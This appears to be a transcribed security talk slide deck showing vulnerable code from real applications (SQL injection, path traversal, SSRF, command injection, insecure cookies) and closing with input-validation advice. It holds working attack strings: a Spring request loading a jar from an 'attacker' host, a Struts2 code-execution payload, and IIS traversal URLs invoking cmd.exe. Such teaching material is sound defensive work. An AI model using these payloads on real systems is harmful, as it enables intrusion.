Don`t Try This At Home

Download Report

Transcript Don`t Try This At Home

DON’T TRY TH IS AT HOME

Some of the code examples in this presentation may shock even the strongest of developers. If you are faint of heart, or don’t like a good laugh, then it may pay to leave the room...... No really...

JAVA PHP ASP C# VB.Net

All Languages Can Lead To Security Vulnerabilities PERL PYTHON FLASH C, C++ CFML

Security Vulnerability

Abritrary Graph Of Statistics Of Vulnerabilities

3 rd Hit Is A Vulnerability In A Graph Application And Its SQL Injection Have I Mentioned 2010 Yet?

Abritrary Graph Of Statistics Of Vulnerabilities

http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf

Abritrary Graph Of Statistics Of Vulnerabilities

http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf

Abritrary Graph Of Statistics Of Vulnerabilities

Huh?

http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf

Apologies The code you are about to see comes from real applications, only the variable names have been changed to protect the guilty.

If this code resembles yours, you may want to take notes...

What's Wrong With This Picture if (!string.IsNullOrEmpty( Request.QueryString["Eid"])) CMSMain.WhereCondition =

Data Access Through Framework

"TitleID IN (SELECT TitleID FROM CMS_Documents WHERE EID = " + Request.QueryString["Eid"] + ")“;

Frameworks Don’t Always Protect You

Frameworks Segway....

Framework Bugs Spring Framework Spring Framework execution of arbitrary code http://blog.o0o.nu/2010/06/cve-2010-1622.html

Any Form Controller

POST /adduser HTTP/1.0

...

class.classLoader.URLs[0]= jar:http://attacker/spring-exploit.jar!/

Overwrite The WebappClassLoader URL With An Arbitrary Remote Jar

Framework Bugs Struts2/XWork Framework Struts2 Framework execution of arbitrary code http://blog.o0o.nu/2010/07/cve-2010-1870 struts2xwork-remote.html

http://mydomain/MyStruts.action?

('\u0023_memberAccess[\'allowStaticMethodAc cess\']')(meh)=true&(aaa) (('\u0023context[\'xwork.MethodAccessor.den

yMethodExecution\']\u003d\u0023foo')(\u0023 foo\u003dnew%20java.lang.Boolean("false"))) &(asdf) (('\u0023rt.exit(1)')

Execute Arbitrary Java Code

(\u0023rt\[email protected]@getRunti me()))=1

“Lets make a list...” OWASP Top 10

Trusting Filenames From The User Image Loader Called via pages to display images Passed an image name in the URL public void ProcessRequest(HttpContext context) { string ImageUrl = context.Request.QueryString["ImageUrl"]; ..

context.Response.WriteFile(ImageUrl); }

Retrieve Arbitrary File From Server

Trusting URLS From The User Help System Page Loader Called to load help contents from other server Passed a page reference in the URL public byte[] GetBytesFromUrl(string url) { HttpWebRequest myReq =

Make Internal Network Requests

WebRequest.Create(url); var webResponse = webRequest.GetResponse(); using (var responseStream = webResponse.GetResponseStream()) { return responseStream.ToBytes(); } }

Using 302 Redirect As Security Measure Making Unauthenticated Request Results in a 302 redirect to the login page HTTP/1.1 302 Found Location: /admin/login Content-Type: text/html; charset=utf-8 Content-Length: 13226

That Seems Suspiciously Large

Object moved

Object moved to here.

Using 302 Redirect As Security Measure HTTP/1.1 302 Found Location: /admin/login Content-Type: text/html; charset=utf-8 Content-Length: 13226 Object moved

Object moved to

Oh there it is.

href="/admin/login">here.

File Upload

Things that work

Things that DO NOT work Posting the CAPTCHA answer and response Posting the CAPTCHA ‘id’ and response POST /captcha HTTP/1.0

answer=kbpsh&response=kbpsh....

Using HTML to display the CAPTCHA ‘word’ Using HTML to display a mathematical equation to solve Please type in these letters: kbpsh

Shopping Cart Troubles Usual Shopping Process

Shopping Cart Troubles My Shopping Process

Add To Cart Contents After Payment Processed

Flash Accepts User Input Image Loader Flash loaded by HTML page HTML page sets parameters

Can Be Set Via URL Parameters

private var imgPath:String; imgPath = "http://localhost/sample.jpg" : img = this.loaderInfo.parameters.img; img_holder = new Image(imgPath);

Flash Movie Host On Your Site, Loading Images From Attackers Site

Cross System Data Truncation Forgotten Password Feature Page accepts email address and checks it is valid strEmail = Request.Form("txtemail") If strEmail <> "" Then objQRY.ClearParameters

objQRY.AddParameter "@email", trim(strEmail)

Calls A Stored Procedure

set rsLogin = objQRY.ReturnRS("spUserMatch")

Cross System Data Truncation Forgotten Password Feature Stored procedures does a user lookup CREATE PROCEDURE [dbo].[spUserMatch] @email varchar(100) = null ...

Truncates Input To 100 Characters

Cross System Data Truncation Forgotten Password Feature If user exists, send email with new password Set Mailer = Server.CreateObject("SMTPsvg.Mailer") Mailer.Subject = "New Password" Mailer.BodyText = strBody Mailer.Recipient = strEmail

Attacker Receives Copy Of Email Uses The Original Input (Non Truncated) <100 spaces>;

Cookie Data Serialisation Object Serialised Base64 encoded and stored as cookie // create map java.util.HashMap map = new java.util.HashMap(); map.put("UserId", UserId); map.put("email", email); // Serialise and B64 it String info = java.net.URLEncoder.encode(new String(org.apache.commons.codec.binary.Base64.encode

Base64(buffer.toByteArray()),"UTF-8"),"UTF-8"); // Store it in cookie org.apache.cocoon.environment.http.HttpCookie cookie = new org.apache.cocoon.environment.http.HttpCookie("SESSI ON", info);

Cookie Data Serialisation Object Is Stored Insecurely In Cookie Base64 is not encryption Cookie Data Can Be Decoded And modified And recoded And sent back Application Deserialises It And trusts it And attacker gains access as another userID

Lets Not Leave Out PHP Execute System() With User Supplied Input This was for real.... In a ‘security’ appliance used by .mil

if ($_GET["cmd"] == "TERMEND") { $sid = $_GET["param"]; $cmd = "/var/www/htdocs/utt/Queue.pl

delete_message_queue $sid"; system($cmd);

Did I Mention That It Was Unauthenticated Access

Cookies Well, This Sure Looks Useful void CheckLoginCount() { HttpCookie cookie = Request.Cookies["LoginAttempts"]; } if (cookie != null) { int attempts = cookie.Value; if (attempts >= 5) Redirect("~/AccessDenied.aspx”); }

More Cookies Remember Me Functionality User selects remember me Application generates random token Stores token in cookie, and in database $token = substr(md5(uniqid(rand(), true)), 0, 49 - strlen($this->ID)); $this->RememberLoginToken = $token; Cookie::set('rem_me', $this->ID . ':' . $token);

More Cookies Remember Me Functionality User selects to logout Application sets token to null Stores null in cookie, and in database $this->RememberLoginToken = null; Cookie::set('rem_enc', null);

More Cookies Remember Me Functionality If the user doesn’t logout they use the autologin feature Application loads user based on cookie value Application checks the $tokens match list($uid, $token) = explode(':', Cookie::get(‘rem_me'), 2); $a_uid = Convert::raw2sql($uid); $user = DataObject:: get_one(“User", “User.ID = '$a_uid'"); if($user && $user->RememberLoginToken != $token) { $member = null; }

What Happens If $token is empty (null)

Evil Users Never Trust User Supplied Input

No really, users are evil And Hands Leap Out Of Matrix Style Backgrounds

Input Validation Input Validation Is The Key No I didn’t say ‘silver bullet’ Properly implemented can prevent most app vulns Validate At Input Validate all input to ensure if conforms to the required format Validate All Input Text strings, Cookie values, HTTP headers File data, Path names, URL values, Currency Data from databases, 3rd parties, web services

Client Site Validation Should only be used to reduce browser requests Never rely on client side validation for security Backend Validation Validate the data Ensure the user is authorised to access data records Should not matter what values the user sends

Data Normalisation Data Comes In Many Forms “this is data” %74%68%69%73%20%69%73%20%64%61%74%61 this is 0;data “ThIs iS dAtA” Many paths to the same location /help.jsp?page=user/welcome.htm

/help.jsp?page=user/../admin/welcome.htm

/help.jsp?page=user\..\admin/welcome.htm

/help.jsp?page=user\/\/..//\\/admin/welcome.htm

/help.jsp?page=help.jsp

Data Decoding or Normalisation Depending On Application Decode or reject Detect Encoded Data Decode the data and compare to original Decode Recursively To Its Lowest Form Concatenation of paths Multiple layers of encoding Formalise Decoding Order To prevent unintended decoding later in the application

Data Decoding And Validation FAIL MS Extended Unicode vulnerability /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir MS Double Decode vulnerability /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir NGINX Source Code Disclosure http://www.example.com/file.php%20

Conforms Ensure Data Conforms To Required Format Check length, type, min() max() values Alphanumeric only Must be a valid date Reject Bad Data Do not attempt to fix it up Easily leads to confusion Use Data Whitelists Checks against a list of known good values Easier to know which values are good input The recommended approach

Santise Data For Use Data Will Be Used In Different Place SQL, XML, Output, Log files Requires Different Sanitisation Remove meta chars Remove special characters Remove Linefeeds Use Standard Formalised Reusable Code Blocks Most languages contain these OWASP supplies some Homebrew stuff should be well tested and documented at the start of development

When Filtering Goes Wrong This Is Not Filtering If (imageurl = “/web.config”) exit() And Yes, XSS without